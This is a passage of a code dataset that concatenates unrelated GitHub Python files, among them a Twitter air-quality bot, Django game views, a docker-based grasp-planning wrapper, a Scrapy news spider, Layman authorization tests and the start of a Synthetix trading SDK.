api.mentions_timeline(last_seen_id, tweet_mode=\"extended\")\n\n for mention in reversed(mentions):\n if \"airqual\" in mention.full_text:\n last_seen_id = mention.id\n store_id(last_seen_id, FILE)\n tweet = (mention.full_text)\n clean_tweet = re.sub(\"@[A-Za-z0-9_]+\", \"\", tweet)\n clean_tweet = re.sub(\"#[A-Za-z0-9_]+\", \"\", clean_tweet)\n clean_tweet = re.sub(\"''[A-Za-z0-9_]+\", \"\", clean_tweet)\n clean_tweet = clean_tweet.lower()\n clean_tweet = clean_tweet.replace(\" \", \"\")\n clean_tweet = \" 
\".join(clean_tweet.split())\n # logic to sort location for api search params go here\n city = clean_tweet\n print(city)\n # logic for conditional rendering of error msg or aqual here\n aqual = get_data()\n if aqual != None:\n print(f'{aqual} for {city}')\n reply()\n \n\n print(\"sleeping\")\n time.sleep(30)\n print('awake')","repo_name":"Iffat77/aqbot","sub_path":"venv/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74502950532","text":"import nltk\nfrom nltk.stem import WordNetLemmatizer, PorterStemmer\nfrom nltk.corpus import wordnet\n\nlemmatiseur = WordNetLemmatizer()\nstemmer = PorterStemmer()\n\n\ndef wordnet_pos(treebank_tag):\n if treebank_tag.startswith('J'): return wordnet.ADJ\n if treebank_tag.startswith('V'): return wordnet.VERB\n if treebank_tag.startswith('N'): return wordnet.NOUN\n if treebank_tag.startswith('R'): return wordnet.ADV\n return ''\n\n\ndef analyse_morphologique(mot, tag):\n lemme = lemmatiseur.lemmatize(mot, pos=tag)\n racine = stemmer.stem(mot)\n return {\"mot\": mot, \"lemme\": lemme, \"racine\": racine}\n\n\ntext = \"don't father's parents' birds flies knives being flying lovely axes glasses given greatest faster lovelier \" \\\n \"mashed bathed accessed\"\ntokens = text.split(\" \")\ntagged = nltk.pos_tag(tokens)\nfor token, tag in tagged:\n print(analyse_morphologique(token, wordnet_pos(tag)))","repo_name":"valentinRieu/NLP-with-Python","sub_path":"examples/morpho_winograd_nltk.py","file_name":"morpho_winograd_nltk.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"12791515849","text":"from django.http import HttpResponse\nfrom django.shortcuts import render,redirect\nfrom django.contrib.auth.forms import UserCreationForm,AuthenticationForm\nfrom django.contrib.auth import authenticate,login\nfrom django.views.generic import View\nfrom django.contrib.auth.models import User\nfrom django.contrib import messages\nfrom django.db.models import Q,F\nfrom django.contrib.auth import logout\n\nfrom datetime import timedelta\nimport datetime\n\nimport re\n\nfrom uinfo.models import *\nfrom uinfo.attrmixin import *\nfrom .models import RudnikModel\n\nclass rudnikPage(GetUserInfo,View):\n def get(self,request,*args,**kwargs):\n uid = request.user.id # ид авторизованного пользователя\n logic_data = super(rudnikPage, self)\n context = logic_data.UserStat(uid) # Статы\n getRudnikLevel = UserAttribute.objects.filter(user_id = uid).only('rudnik_level')\n for r in getRudnikLevel:\n rLevel = r.rudnik_level\n context['rudnikLevel']=rLevel\n\n totalBonus = 10\n \n if rLevel<=5:\n totalBonus+=rLevel*1\n context['TotalBonus'] = totalBonus\n elif rLevel >=6 and rLevel <=10:\n totalBonus+=(rLevel-5)*2+4\n elif rLevel >=11 and rLevel <=15:\n totalBonus+=(rLevel-10)*3+14\n elif rLevel >=16 and rLevel <=19:\n totalBonus+=(rLevel-15)*5+39\n \n \n context['TotalBonus']=totalBonus\n #Получить цену на апгрейд\n getNextUpRudnik = RudnikModel.objects.filter(RudnikLevel = rLevel+1)\n if not getNextUpRudnik:\n context['DoneRudnik']= True\n else:\n for b in getNextUpRudnik:\n RudnikPrice = b.RudnikPrice\n #context['totalBonus'] = b.\n context['link'] = b.RudnikLevel # ссылка\n context['price'] = b.RudnikPrice\n context['bonus'] = b.RudnikBonus\n \n \n infoAboutTime = UserAttribute.objects.filter(user_id=uid)\n for t in infoAboutTime:\n if not 
t.last_accept_rudnik:\n UserAttribute.objects.filter(user_id=uid).update(last_accept_rudnik=datetime.date.today())\n else:\n if t.last_accept_rudnik < datetime.date.today():\n UserAttribute.objects.filter(user_id=uid).update(last_accept_rudnik=datetime.date.today())\n UserAttribute.objects.filter(user_id=uid).update(knights=F('knights')+totalBonus)\n messages.add_message(request, messages.INFO, \"Собрали кнайты\")\n return redirect('rudnikPage')\n\n\n\n\n return render(request,'rudnik.html',context)\n\nclass UpRudnik(get_user_info,View):\n def post(self,request,RudnikLevel,*args,**kwargs):\n uid = request.user.id # ид авторизованного пользователя\n logic_data = super(UpRudnik, self)\n\n listUserStat = logic_data.get_list_stat(uid)\n Userknights = listUserStat['knights']\n\n getRudnikLevel = UserAttribute.objects.filter(user_id = uid).only('rudnik_level')\n for r in getRudnikLevel:\n rLevel = r.rudnik_level\n\n getNextUpRudnik = RudnikModel.objects.filter(RudnikLevel = rLevel+1)\n if not getNextUpRudnik:\n pass\n else:\n for b in getNextUpRudnik:\n RudnikPrice = b.RudnikPrice\n UpPrice = b.RudnikPrice\n \n if Userknights >= RudnikPrice:\n UserAttribute.objects.filter(user_id=uid).update(knights=F('knights')-RudnikPrice,rudnik_level=F('rudnik_level')+1)\n messages.add_message(request, messages.INFO, \"Прокачали рудник\")\n return redirect('rudnikPage')\n else:\n messages.add_message(request, messages.INFO, \"Не хватает валюты\")\n return redirect('rudnikPage')\n\n\n\n\n\n","repo_name":"val1n0r/mayar","sub_path":"rudnik/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"13797546346","text":"import os\nimport os.path as path\n\ndef calc_grasping_point(rgb_path, depth_path, result_txt_path='./grasping_result.txt', result_image_path=None, docker_container='gqcnn'):\n workspace = '/root/Workspace'\n deeplab = path.join(workspace, 'pytorch-deeplab-xception')\n gqcnn = path.join(workspace, 'gqcnn') \n\n work_rgb_path = path.join(workspace, 'sample_rgb.jpg')\n work_depth_path = path.join(workspace, 'sample_depth.npy')\n work_depth_mask_path = path.join(workspace, 'sample_depth_mask.npy')\n work_segmask_path = path.join(workspace, 'sample_segmask.jpg')\n work_result_txt_path = path.join(workspace, 'sample_grasping_result.txt')\n work_result_image_path = path.join(workspace, 'sample_grasp.jpg')\n\n print(rgb_path, docker_container, work_rgb_path)\n os.system('docker cp {} {}:{}'.format(\n rgb_path, docker_container, work_rgb_path\n ))\n os.system('docker cp {} {}:{}'.format(\n depth_path, docker_container, work_depth_path\n ))\n\n os.system('docker exec -it -w {} {} python3 test.py --in-path {} --depth-path {}'.format(\n deeplab, docker_container, work_rgb_path, work_depth_path\n ))\n\n os.system('docker exec -it -w {} {} python3 examples/policy.py GQCNN-4.0-PJ --depth_image {} --segmask {} --camera_intr data/calib/phoxi/phoxi.intr > /dev/null'.format(\n gqcnn, docker_container, work_depth_mask_path, work_segmask_path\n ))\n\n os.system('docker cp {}:{} {}'.format(\n docker_container, work_result_txt_path, result_txt_path\n ))\n if result_image_path != None:\n os.system('docker cp {}:{} {}'.format(\n docker_container, work_result_image_path, result_image_path\n ))\n\n return parse_txt_file(result_txt_path)\n\ndef parse_txt_file(txt_path):\n data = open(txt_path).read()\n data = data.strip().split('\\n')\n data = [parse_line(d) for d in data]\n return dict(data)\n\ndef 
parse_line(line):\n name, value = line.split(' : ')\n name = ''.join(name.split(' ')[1:])\n if name == 'depth':\n value = value.replace('m', '')\n value = eval(value)\n return (name, value)\n\nif __name__ == '__main__':\n rgb_path = 'sample/ham2_nip_snap_rgb_0.jpg'\n depth_path = 'sample/ham2_nip_snap_depth_0.npy'\n \n txt_path = 'sample/grasping_result.txt'\n image_path = 'sample/grasping_result.jpg' # option. default=None\n docker_container = 'gqcnn' # option. default='gqcnn'\n grasping_point = calc_grasping_point(rgb_path, depth_path, txt_path, result_image_path=image_path, docker_container=docker_container)\n print(grasping_point)\n","repo_name":"TMmichi/vrep_jaco","sub_path":"rl_controller/scripts/cip_data/gqcnn.py","file_name":"gqcnn.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"28007366346","text":"\nfrom hydra.utils import instantiate\nfrom pytorch_lightning import LightningModule\nimport torch\nfrom torch import nn\n\nfrom omegaconf import OmegaConf\n\n\nclass DenseNet(LightningModule):\n\n def __init__(self, in_dim, hidden_dims, out_dim, optimizer_cfg=None):\n super().__init__()\n self.save_hyperparameters()\n\n self.in_dim = in_dim\n self.hidden_dims = OmegaConf.to_container(hidden_dims)\n self.out_dim = out_dim\n self.optimizer_cfg = optimizer_cfg\n\n self.layer_sizes = [self.in_dim] + self.hidden_dims + [self.out_dim]\n self.layers = []\n for i in range(len(self.layer_sizes)-1):\n self.layers.append(nn.Linear(self.layer_sizes[i], self.layer_sizes[i+1]))\n\n self.net = nn.Sequential(*self.layers)\n self.softmax = nn.Softmax(dim=1)\n\n self.loss_fn = nn.CrossEntropyLoss()\n\n def configure_optimizers(self):\n return instantiate(self.optimizer_cfg, params=self.parameters())\n\n def forward(self, x):\n logits = self.net(x)\n return logits\n\n def training_step(self, batch, batch_idx):\n x = batch[\"input\"]\n y = batch[\"target\"]\n logits = self.forward(x)\n loss = self.loss_fn(logits, y)\n\n if self.trainer.global_step % 50 == 0:\n self.logger.experiment.add_scalar(\"train_loss_step\", loss, self.trainer.global_step)\n\n return {\"loss\": loss}\n\n def training_epoch_end(self, outputs):\n avg_loss = torch.stack([output[\"loss\"] for output in outputs]).mean()\n self.logger.experiment.add_scalar(\"train_loss_epoch\", avg_loss, self.trainer.current_epoch)\n\n def validation_step(self, batch, batch_idx):\n x = batch[\"input\"]\n y = batch[\"target\"]\n logits = self.forward(x)\n loss = self.loss_fn(logits, y)\n self.log(\"val_loss\", loss)\n return {\"loss\": loss}\n\n def validation_epoch_end(self, outputs):\n avg_loss = torch.stack([output[\"loss\"] for output in outputs]).mean()\n self.logger.experiment.add_scalar(\"val_loss_epoch\", avg_loss, self.trainer.current_epoch)\n\n def test_step(self, batch, batch_idx):\n x = batch[\"input\"]\n y = batch[\"target\"]\n logits = self.forward(x)\n loss = self.loss_fn(logits, y)\n self.log(\"test_loss\", loss)\n return {\"loss\": loss}\n\n def test_epoch_end(self, outputs):\n avg_loss = torch.stack([output[\"loss\"] for output in outputs]).mean()\n self.logger.experiment.add_scalar(\"test_loss_epoch\", avg_loss, self.trainer.current_epoch)\n","repo_name":"jwspaeth/ml_template","sub_path":"src/models/DenseNet.py","file_name":"DenseNet.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"8672824747","text":"import scrapy\nfrom 
scrapy.http import HtmlResponse\nfrom parser_trend.items import ParserTrendItem\n\n\nclass LentaRuSpider(scrapy.Spider):\n name = \"lenta_ru\"\n allowed_domains = [\"lenta.ru\"]\n start_urls = [\"https://lenta.ru/parts/news/\"]\n\n def parse(self, response:HtmlResponse): \n \n news_links = response.xpath(\"//li[@class='parts-page__item']/a/@href\").getall()\n\n for news_link in news_links:\n yield response.follow(news_link, callback=self.news_parse) \n print(f'\\n######################\\nParsing the current page: {response.url}\\n######################\\n')\n\n next_page = response.xpath(\"//a[@class='loadmore js-loadmore']/@href\").get() \n if next_page != \"/parts/news/4/\": # ограничиваем глубину страниц для поиска\n # если следующая страница 4, то паук напишет что текущая страница будет последней для парсинга\n # и последняя страница, которую пропарсит паукт будет 3-ей (так как не предыдущей странице, паук\n # понимает какая будет следующая)\n yield response.follow(next_page, callback=self.parse) \n else:\n print('\\n**********************\\nThis page is last for parsing\\n**********************\\n')\n \n #print(f'\\n######################\\n{next_page}\\n######################\\n')\n\n def news_parse(self, response:HtmlResponse):\n news_name=response.xpath(\"//div[@class='topic-body _news']/h1/span/text()\").getall()[0] \n news_link = response.url\n date_time=response.xpath(\"//a[contains(@class, 'topic-header__time')]/text()\").get().split(\",\")\n news_time=date_time[0]\n news_date=date_time[1] \n #pass\n\n yield ParserTrendItem(\n name=news_name, \n time=news_time,\n date=news_date,\n link=news_link\n \n )","repo_name":"kutsman/Data_collection_and_processing","sub_path":"parser_trend/parser_trend/spiders/lenta_ru.py","file_name":"lenta_ru.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"27964921016","text":"import sys\n\nsys.setrecursionlimit(10 ** 6)\nstdin = sys.stdin\n\nni = lambda: int(ns())\nna = lambda: list(map(int, stdin.readline().split()))\nns = lambda: stdin.readline().strip()\n\nK, N = na()\nA = na()\nmax_l = 0\ntotal = 0\nfor i in range(N - 1):\n max_l = max(max_l, A[i + 1] - A[i])\n total += A[i + 1] - A[i]\nprint(K - max(max_l, K - total))\n","repo_name":"tonko2/AtCoder","sub_path":"abc/160/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33562227113","text":"from django.db import models\n\nfrom sorl.thumbnail import get_thumbnail\nfrom sorl.thumbnail.fields import ImageField\n\nfrom ..base import models as kk\nfrom ..places.models import Place\n\n\nclass LogoMixin(models.Model):\n logo = models.ImageField(\n verbose_name = 'Логотип',\n upload_to = 'images/logos',\n blank = True\n )\n\n# def thumb(self):\n# return get_thumbnail(self.image, '80x60', crop = 'center')\n\n class Meta:\n abstract = True\n\n\nclass Entity(kk.Base):\n\n name = models.CharField(\n verbose_name = 'Название',\n max_length = 120\n )\n\n open = models.BooleanField(\n verbose_name = 'Открыто',\n help_text = 'Снимите флажок, если организация не функционирует',\n default = True\n )\n\n\n# place = models.OneToOneField(\n# Place,\n# on_delete = models.PROTECT,\n# verbose_name = 'место нахождения',\n# related_name = 'entities',\n# related_query_name = 'entity',\n# blank = True,\n# null = True,\n# editable = False,\n## unique = True, # OneToOneField\n# )\n\n def 
__str__(self):\n return '{name} ({type})'.format(\n name = self.name,\n type = self.get_type_display(),\n )\n\n class Meta:\n abstract = True\n ordering = ('name', )\n verbose_name = 'Организация'\n verbose_name_plural = 'Все организации'\n","repo_name":"icw82/django-kk","sub_path":"kk/entities/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"2963253837","text":"import requests\nfrom flask import g\nimport pytest\n\nfrom layman import app, settings, LaymanError\nfrom test_tools import process_client\nfrom test_tools.util import url_for\nfrom . import authorize_workspace_publications_decorator\n\n\n@authorize_workspace_publications_decorator\ndef mock_method():\n pass\n\n\n@pytest.mark.parametrize('request_path', [\n f'/rest/{settings.REST_WORKSPACES_PREFIX}/layers',\n f'/rest/{settings.REST_WORKSPACES_PREFIX}/layers/abc',\n f'/rest/{settings.REST_WORKSPACES_PREFIX}/username/abc',\n f'/rest/{settings.REST_WORKSPACES_PREFIX}/username/publications',\n f'/rest/{settings.REST_WORKSPACES_PREFIX}/username/publications/blablabla',\n f'/rest/{settings.REST_WORKSPACES_PREFIX}/username/publications/blablabla/da',\n f'/rest/{settings.REST_WORKSPACES_PREFIX}/users/layers',\n f'/rest/{settings.REST_WORKSPACES_PREFIX}/users/maps/map',\n f'/rest/layers',\n f'/rest/layers/abc',\n f'/rest/username/abc',\n f'/rest/username/publications',\n f'/rest/username/publications/blablabla',\n f'/rest/username/publications/blablabla/da',\n f'/rest/users/layers',\n f'/rest/users/maps/map',\n])\ndef test_authorize_publications_decorator_does_not_accept_path(request_path):\n with app.test_request_context(request_path):\n with pytest.raises(Exception) as exc_info:\n mock_method()\n assert str(exc_info.value) == f\"Authorization module is unable to authorize path {request_path}\", exc_info.traceback\n\n\n@pytest.mark.parametrize('request_path', [\n f'/rest/{settings.REST_WORKSPACES_PREFIX}/user_a/layers',\n f'/rest/{settings.REST_WORKSPACES_PREFIX}/user_a/layers/',\n f'/rest/{settings.REST_WORKSPACES_PREFIX}/user_a/maps/',\n f'/rest/{settings.REST_WORKSPACES_PREFIX}/user_a/layers/abc',\n f'/rest/{settings.REST_WORKSPACES_PREFIX}/user_a/layers/some_layer/some/nested/endpoint',\n f'/rest/{settings.REST_WORKSPACES_PREFIX}/user_a/maps/a_map',\n f'/rest/user_a/layers',\n f'/rest/user_a/layers/',\n f'/rest/user_a/maps/',\n f'/rest/user_a/layers/abc',\n f'/rest/user_a/layers/some_layer/some/nested/endpoint',\n f'/rest/user_a/maps/a_map',\n])\ndef test_authorize_publications_decorator_accepts_path(request_path):\n with app.test_request_context(request_path):\n # pylint: disable=assigning-non-slot\n g.user = None\n with pytest.raises(Exception) as exc_info:\n mock_method()\n assert isinstance(exc_info.value, LaymanError), exc_info.traceback\n\n\nclass TestRestApiClass:\n layername = 'test_authorize_decorator_layer'\n mapname = 'test_authorize_decorator_map'\n username = 'test_authorize_decorator_user'\n authz_headers = process_client.get_authz_headers(username)\n\n @pytest.fixture(scope=\"class\")\n def provide_publications(self):\n username = self.username\n authz_headers = self.authz_headers\n layername = self.layername\n mapname = self.mapname\n process_client.ensure_reserved_username(username, headers=authz_headers)\n process_client.publish_workspace_layer(username, layername, headers=authz_headers)\n process_client.publish_workspace_map(username, mapname, headers=authz_headers)\n yield\n 
process_client.delete_workspace_layer(username, layername, headers=authz_headers)\n process_client.delete_workspace_map(username, mapname, headers=authz_headers)\n\n @staticmethod\n def assert_response(response, exp_status_code, exp_data):\n assert response.status_code == exp_status_code, response.text\n if exp_status_code == 200 and exp_data is not None:\n resp_json = response.json()\n if callable(exp_data):\n assert exp_data(resp_json), f\"resp_json={resp_json}, exp_data={exp_data}\"\n else:\n assert resp_json == exp_data\n elif exp_status_code != 200 and exp_data is not None:\n resp_json = response.json()\n assert resp_json['code'] == exp_data, f\"resp_json={resp_json}, exp_data={exp_data}\"\n\n @staticmethod\n def has_single_layer(r_json):\n return {li['name'] for li in r_json} == {TestRestApiClass.layername}\n\n @staticmethod\n def has_single_map(r_json):\n return {li['name'] for li in r_json} == {TestRestApiClass.mapname}\n\n @staticmethod\n def has_no_publication(r_json):\n return {li['name'] for li in r_json} == set()\n\n @pytest.mark.parametrize(\n \"rest_action, url_for_params, authz_status_code, authz_response, unauthz_status_code, unauthz_response\",\n [\n ('rest_workspace_layers.get', {}, 200, has_single_layer.__func__, 200, has_no_publication.__func__),\n ('rest_workspace_layer.get', {'layername': layername}, 200, None, 404, 15),\n ('rest_workspace_layer_metadata_comparison.get', {'layername': layername}, 200, None, 404, 15),\n ('rest_workspace_layer_style.get', {'layername': layername}, 200, None, 404, 15),\n ('rest_workspace_layer_thumbnail.get', {'layername': layername}, 200, None, 404, 15),\n ('rest_workspace_layer_chunk.get', {'layername': layername}, 400, 20, 404, 15),\n ('rest_workspace_maps.get', {}, 200, has_single_map.__func__, 200, has_no_publication.__func__),\n ('rest_workspace_map.get', {'mapname': mapname}, 200, None, 404, 26),\n ('rest_workspace_map_file.get', {'mapname': mapname}, 200, None, 404, 26),\n ('rest_workspace_map_metadata_comparison.get', {'mapname': mapname}, 200, None, 404, 26),\n ('rest_workspace_map_thumbnail.get', {'mapname': mapname}, 200, None, 404, 26),\n ],\n )\n @pytest.mark.usefixtures('oauth2_provider_mock', 'ensure_layman', 'provide_publications')\n def test_authorize_publications_decorator_on_rest_api(\n self,\n rest_action,\n url_for_params,\n authz_status_code,\n authz_response,\n unauthz_status_code,\n unauthz_response,\n ):\n username = self.username\n authz_headers = self.authz_headers\n patch_method = None\n publ_name = None\n if '_layer' in rest_action:\n patch_method = process_client.patch_workspace_layer\n publ_name = self.layername\n elif '_map' in rest_action:\n patch_method = process_client.patch_workspace_map\n publ_name = self.mapname\n assert publ_name\n\n url_for_params['workspace'] = username\n\n with app.app_context():\n rest_url = url_for(rest_action, **url_for_params)\n\n patch_method(username, publ_name, headers=authz_headers, access_rights={\n 'read': username,\n 'write': username,\n })\n response = requests.get(rest_url, headers=authz_headers, timeout=settings.DEFAULT_CONNECTION_TIMEOUT)\n self.assert_response(response, authz_status_code, authz_response)\n response = requests.get(rest_url, timeout=settings.DEFAULT_CONNECTION_TIMEOUT)\n self.assert_response(response, unauthz_status_code, unauthz_response)\n\n patch_method(username, publ_name, headers=authz_headers, access_rights={\n 'read': settings.RIGHTS_EVERYONE_ROLE,\n 'write': settings.RIGHTS_EVERYONE_ROLE,\n })\n response = requests.get(rest_url, 
headers=authz_headers, timeout=settings.DEFAULT_CONNECTION_TIMEOUT)\n self.assert_response(response, authz_status_code, authz_response)\n response = requests.get(rest_url, timeout=settings.DEFAULT_CONNECTION_TIMEOUT)\n self.assert_response(response, authz_status_code, authz_response)\n","repo_name":"LayerManager/layman","sub_path":"src/layman/authz/authz_test.py","file_name":"authz_test.py","file_ext":"py","file_size_in_byte":7576,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"44"} +{"seq_id":"25011965356","text":"import shutil\nfrom io import StringIO\nfrom logging import Logger\nfrom typing import List, Tuple, Optional\n\nfrom bauh.commons import system\nfrom bauh.commons.system import SimpleProcess\n\n\ndef is_installed() -> bool:\n return bool(shutil.which('git'))\n\n\ndef list_commits(proj_dir: str, limit: int = -1, logger: Optional[Logger] = None) -> Optional[List[Tuple[str, int]]]:\n if limit == 0:\n return\n\n cmd = StringIO()\n cmd.write('git log --format=\"%H %ct\"')\n\n if limit > 0:\n cmd.write(f' -{limit}')\n\n code, output = system.execute(cmd.getvalue(), cwd=proj_dir, shell=True)\n\n if code == 0 and output:\n commits = []\n for line in output.split('\\n'):\n line_strip = line.strip()\n\n if line_strip:\n line_split = line_strip.split(' ', 1)\n\n if len(line_split) == 2:\n commit_sha = line_split[0].strip()\n try:\n commit_date = int(line_split[1].strip())\n except ValueError:\n commit_date = None\n\n if logger:\n logger.error(f\"Could not parse commit date {line_split[1]}\")\n\n commits.append((commit_sha, commit_date))\n\n return commits\n\n\ndef clone(url: str, target_dir: Optional[str], depth: int = -1, custom_user: Optional[str] = None) -> SimpleProcess:\n cmd = ['git', 'clone', url]\n\n if depth > 0:\n cmd.append(f'--depth={depth}')\n\n if target_dir:\n cmd.append(target_dir)\n\n return SimpleProcess(cmd=cmd, custom_user=custom_user)\n","repo_name":"vinifmor/bauh","sub_path":"bauh/gems/arch/git.py","file_name":"git.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":799,"dataset":"github-code","pt":"44"} +{"seq_id":"12598621415","text":"import asyncio\nimport time\nimport logging\nimport warnings\nimport web3\nfrom web3 import Web3\nfrom web3.constants import ADDRESS_ZERO\nfrom web3.types import TxParams\nfrom .constants import (\n DEFAULT_NETWORK_ID,\n DEFAULT_TRACKING_CODE,\n DEFAULT_SLIPPAGE,\n DEFAULT_GQL_ENDPOINT_PERPS,\n DEFAULT_GQL_ENDPOINT_RATES,\n DEFAULT_PRICE_SERVICE_ENDPOINTS,\n DEFAULT_REFERRER,\n DEFAULT_TRACKING_CODE,\n)\nfrom .utils import wei_to_ether, ether_to_wei\nfrom .contracts import load_contracts\nfrom .pyth import Pyth\nfrom .core import Core\nfrom .perps import Perps\nfrom .spot import Spot\n\n# from .alerts import Alerts\nfrom .queries import Queries\n\nwarnings.filterwarnings(\"ignore\")\n\n\nclass Synthetix:\n \"\"\"\n The main class for interacting with the Synthetix protocol. The class\n requires a provider RPC endpoint and a wallet address::\n\n snx = Synthetix(\n provider_rpc='https://base-mainnet.infura.io/v3/...',\n network_id=8453,\n address='0x12345...'\n )\n\n The class can be initialized with a private key to allow for transactions\n to be signed and sent to your RPC::\n\n snx = Synthetix(\n provider_rpc='https://base-mainnet.infura.io/v3/...',\n network_id=8453,\n address='0x12345...',\n private_key='0xabcde...'\n )\n\n :param str provider_rpc: An RPC endpoint to use for the provider that interacts\n with the smart contracts. 
This must match the ``network_id``.\n :param str mainnet_rpc: A mainnet RPC endpoint to use for the provider that\n fetches deployments from the Cannon registry.\n :param str ipfs_gateway: An IPFS gateway to use for fetching deployments from Cannon.\n :param str address: Wallet address to use as a default. If a private key is\n specified, this address will be used to sign transactions.\n :param str private_key: Private key of the provided wallet address. If specified,\n the wallet will be enabled to sign and submit transactions.\n :param int network_id: Network ID for the chain to connect to. This must match\n the chain ID of the RPC endpoint.\n :param int core_account_id: A default ``account_id`` for core transactions.\n Setting a default will avoid the need to specify on each transaction. If\n not specified, the first ``account_id`` will be used.\n :param int perps_account_id: A default ``account_id`` for perps transactions.\n Setting a default will avoid the need to specify on each transaction. If\n not specified, the first ``account_id`` will be used.\n :param str tracking_code: Set a tracking code for trades.\n :param str referrer: Set a referrer address for trades.\n :param float max_price_impact: Max price impact setting for trades,\n specified as a percentage. This setting applies to both spot and\n perps markets.\n :param bool use_estimate_gas: Use estimate gas for transactions. If false,\n it is assumed you will add a gas limit to all transactions.\n :param str gql_endpoint_perps: GraphQL endpoint for perps data.\n :param str satsuma_api_key: API key for Satsuma. If the endpoint is from\n Satsuma, the API key will be automatically added to the request.\n :param str price_service_endpoint: Endpoint for a Pyth price service. If\n not specified, a default endpoint is used.\n :return: Synthetix class instance\n :rtype: Synthetix\n \"\"\"\n\n def __init__(\n self,\n provider_rpc: str,\n mainnet_rpc: str = \"https://eth.llamarpc.com\",\n ipfs_gateway: str = \"https://ipfs.io/ipfs\",\n address: str = ADDRESS_ZERO,\n private_key: str = None,\n network_id: int = None,\n core_account_id: int = None,\n perps_account_id: int = None,\n tracking_code: str = None,\n referrer: str = None,\n max_price_impact: float = DEFAULT_SLIPPAGE,\n use_estimate_gas: bool = True,\n cannon_config: dict = None,\n gql_endpoint_perps: str = None,\n gql_endpoint_rates: str = None,\n satsuma_api_key: str = None,\n price_service_endpoint: str = None,\n telegram_token: str = None,\n telegram_channel_name: str = None,\n ):\n # set up logging\n self.logger = logging.getLogger(self.__class__.__name__)\n self.logger.setLevel(logging.INFO)\n\n handler = logging.StreamHandler()\n handler.setFormatter(\n logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\n )\n self.logger.addHandler(handler)\n\n # set default values\n if network_id is None:\n network_id = DEFAULT_NETWORK_ID\n else:\n network_id = int(network_id)\n\n if tracking_code:\n self.tracking_code = tracking_code\n else:\n self.tracking_code = DEFAULT_TRACKING_CODE\n\n if referrer:\n self.referrer = referrer\n else:\n self.referrer = DEFAULT_REFERRER\n\n if max_price_impact:\n self.max_price_impact = max_price_impact\n else:\n self.max_price_impact = DEFAULT_SLIPPAGE\n\n # init account variables\n self.private_key = private_key\n self.address = address\n self.use_estimate_gas = use_estimate_gas\n self.cannon_config = cannon_config\n self.provider_rpc = provider_rpc\n self.mainnet_rpc = mainnet_rpc\n self.ipfs_gateway = ipfs_gateway\n\n # init 
chain provider\n if provider_rpc.startswith(\"http\"):\n web3 = Web3(Web3.HTTPProvider(self.provider_rpc))\n elif provider_rpc.startswith(\"wss\"):\n web3 = Web3(Web3.WebsocketProvider(self.provider_rpc))\n else:\n raise Exception(\"Provider RPC endpoint is invalid\")\n\n # check if the chain_id matches\n if web3.eth.chain_id != network_id:\n raise Exception(\"The RPC `chain_id` must match the stored `network_id`\")\n else:\n self.nonce = web3.eth.get_transaction_count(self.address)\n\n self.web3 = web3\n self.network_id = network_id\n\n # init contracts\n self.contracts = load_contracts(self)\n (\n self.v2_markets,\n self.susd_legacy_token,\n self.susd_token,\n self.multicall,\n ) = self._load_contracts()\n\n # init alerts\n # if telegram_token and telegram_channel_name:\n # self.alerts = Alerts(telegram_token, telegram_channel_name)\n\n # init queries\n if not gql_endpoint_perps and self.network_id in DEFAULT_GQL_ENDPOINT_PERPS:\n gql_endpoint_perps = DEFAULT_GQL_ENDPOINT_PERPS[self.network_id]\n\n if not gql_endpoint_rates and self.network_id in DEFAULT_GQL_ENDPOINT_RATES:\n gql_endpoint_rates = DEFAULT_GQL_ENDPOINT_RATES[self.network_id]\n\n self.queries = Queries(\n synthetix=self,\n gql_endpoint_perps=gql_endpoint_perps,\n gql_endpoint_rates=gql_endpoint_rates,\n api_key=satsuma_api_key,\n )\n\n # init pyth\n if (\n not price_service_endpoint\n and self.network_id in DEFAULT_PRICE_SERVICE_ENDPOINTS\n ):\n price_service_endpoint = DEFAULT_PRICE_SERVICE_ENDPOINTS[self.network_id]\n\n self.pyth = Pyth(self, price_service_endpoint=price_service_endpoint)\n self.core = Core(self, core_account_id)\n self.perps = Perps(self, self.pyth, perps_account_id)\n self.spot = Spot(self, self.pyth)\n\n def _load_contracts(self):\n \"\"\"\n Initializes and sets up contracts according to the connected chain.\n On calling this function, the following contracts are connected and set up:\n * ``PerpsV2MarketData``\n * ``PerpsV2MarketProxy`` (for each V2 market)\n * ``sUSD`` contracts for both V3 and legacy sUSD.\n * ``TrustedMulticallForwarder`` (if available)\n\n These are stored as methods on the base Synthetix object::\n\n >>> snx.susd_token.address\n 0x...\n\n :return: web3 contracts\n :rtype: [contract, contract, contract, contract]\n \"\"\"\n w3 = self.web3\n\n if \"PerpsV2MarketData\" in self.contracts:\n data_definition = self.contracts[\"PerpsV2MarketData\"]\n data_address = w3.to_checksum_address(data_definition[\"address\"])\n data_abi = data_definition[\"abi\"]\n\n marketdata_contract = w3.eth.contract(data_address, abi=data_abi)\n\n try:\n allmarketsdata = (\n marketdata_contract.functions.allProxiedMarketSummaries().call()\n )\n except Exception as e:\n allmarketsdata = []\n\n markets = {\n market[2]\n .decode(\"utf-8\")\n .strip(\"\\x00\")[1:-4]: {\n \"market_address\": market[0],\n \"asset\": market[1].decode(\"utf-8\").strip(\"\\x00\"),\n \"key\": market[2],\n \"maxLeverage\": 